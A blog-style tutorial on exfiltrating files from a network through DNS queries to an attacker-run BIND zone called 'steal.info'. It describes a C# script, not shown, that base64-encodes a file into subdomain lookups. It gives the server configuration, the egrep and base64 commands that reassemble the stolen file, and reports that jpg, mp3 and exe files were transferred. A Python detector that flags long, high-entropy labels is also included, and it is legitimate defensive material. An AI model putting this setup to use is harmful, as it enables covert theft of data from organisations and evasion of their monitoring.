Data Exfiltration Over DNS

What is it?


Bad guys use various methods to exfiltrate data from an organization or any other target; basically, they need to get the data out without being detected. Most organizations use firewalls and IDS to secure their network but still allow DNS (incoming/outgoing) 😀 so over DNS we can transfer files and other important stuff 😉 Here I wrote a simple C# script to demonstrate the attack. For Educational Purposes Only

How does it work?

The idea is simple: the script base64-encodes your data, splits it into small parts and sends each part as the leftmost label of an nslookup request for your domain, so every chunk is answered (and logged) by the remote authoritative server you control. You then parse the query log on that server, put the chunks back in order and decode the file.
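The same mechanism tells a defender what to look for: long, high-entropy leftmost labels and an unusual number of distinct subdomains under one zone coming from a single client. The following Python, added here as an example and not part of the original script, parses constructed BIND query-log lines in the format the `print-time`/`print-category` logging channel produces and flags both patterns; the sample lines, the thresholds and the alert tuple format are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed sample lines approximating BIND's query log with print-time and
# print-category enabled; the second client is behaving like a chunked upload.
SAMPLE_LOG = """\
15-Mar-2019 10:00:01.001 queries: info: client 10.0.0.5#53001 (www.example.com): query: www.example.com IN A + (10.0.0.1)
15-Mar-2019 10:00:02.002 queries: info: client 10.0.0.5#53002 (mail.example.com): query: mail.example.com IN MX + (10.0.0.1)
15-Mar-2019 10:00:03.003 queries: info: client 10.0.0.7#53003 (iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ.steal.info): query: iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ.steal.info IN A + (10.0.0.1)
15-Mar-2019 10:00:03.004 queries: info: client 10.0.0.7#53004 (AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==.steal.info): query: AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==.steal.info IN A + (10.0.0.1)
"""

# Newer BIND versions print "client @0x... IP#port"; the optional group covers both forms.
QUERY_RE = re.compile(r"client (?:@0x[0-9a-f]+ )?(?P<ip>[\d.]+)#\d+ .*?query: (?P<qname>\S+) IN (?P<qtype>\S+)")


def shannon_entropy(s):
    """Bits per character; ordinary hostnames score low, encoded chunks score high."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def parse_queries(log_text):
    """Yield (client_ip, qname, qtype) for every query line in a BIND query log."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("ip"), m.group("qname").rstrip("."), m.group("qtype")


def find_suspicious(log_text, max_label_len=30, min_entropy=4.0, max_unique_labels=20):
    """Return alert tuples (client_ip, zone, reason, detail).

    A query is flagged when its leftmost label is unusually long or high-entropy;
    a (client, zone) pair is flagged when it asks for many distinct leftmost labels,
    which is what a chunked upload looks like whatever encoding is used.
    """
    alerts = []
    seen = defaultdict(set)
    for ip, qname, _qtype in parse_queries(log_text):
        first, _, zone = qname.partition(".")
        if len(first) > max_label_len or shannon_entropy(first) >= min_entropy:
            alerts.append((ip, zone, "suspicious_label", first))
        seen[(ip, zone)].add(first)
    for (ip, zone), labels in seen.items():
        if len(labels) > max_unique_labels:
            alerts.append((ip, zone, "high_label_cardinality", str(len(labels))))
    return alerts
```

Tune the thresholds against your own baseline: CDN and anti-spam lookups also produce long labels, so the cardinality rule per client and zone is usually the more reliable of the two.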

Prerequisite

This is what my configuration files look like:

cat named.conf
include "/etc/bind/named.conf.options";
include "/etc/bind/named.conf.local";
include "/etc/bind/named.conf.default-zones";
logging {
    // write every query, with its timestamp and category, to /var/log/qrlog
    channel querylog {
        file "/var/log/qrlog";
        print-category yes;
        print-time yes;
    };
    category queries { querylog; };
};

cat db.steal.info
$TTL 86400
@ IN SOA steal.info. root.localhost. (
          1 ; Serial
     604800 ; Refresh
      86400 ; Retry
    2419200 ; Expire
      86400 ) ; Negative Cache TTL
;
@ IN NS localhost.
@ IN A 10.0.0.1

cat named.conf.local
zone "steal.info" {
    type master;
    file "/etc/bind/db.steal.info";
};

Getting started

  1. Download and edit the DnsExfiltration script
    1. static String Domain = "YOUR-DOMAIN-NAME"; // add your BIND domain
    2. static String NSserver = "YOUR-NAME-SERVER"; // add your DNS server's IP address
    3. Call ConvertInto64(string FileTosteal, string PathTosaveEncodedFile) in the Main method
    4. Call SendFile(string PathTosaveEncodedFile)
  2. On the Linux box, open a terminal and run these commands to reassemble the file
    1. egrep -o "[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}.YOUR-DOMAIN-NAME" /var/log/qrlog | cut -d . -f1 | uniq | awk '!a[$0]++' > /pathToSave/file.bin
    2. base64 -d file.bin > decoded.jpg
    3. Done!

Demo Video

I tested this script with the following file types and it works 🙂

  • jpg 1Mb
  • mp3 3MB
  • exe 1MB

Happy Hacking!

Reference

https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664
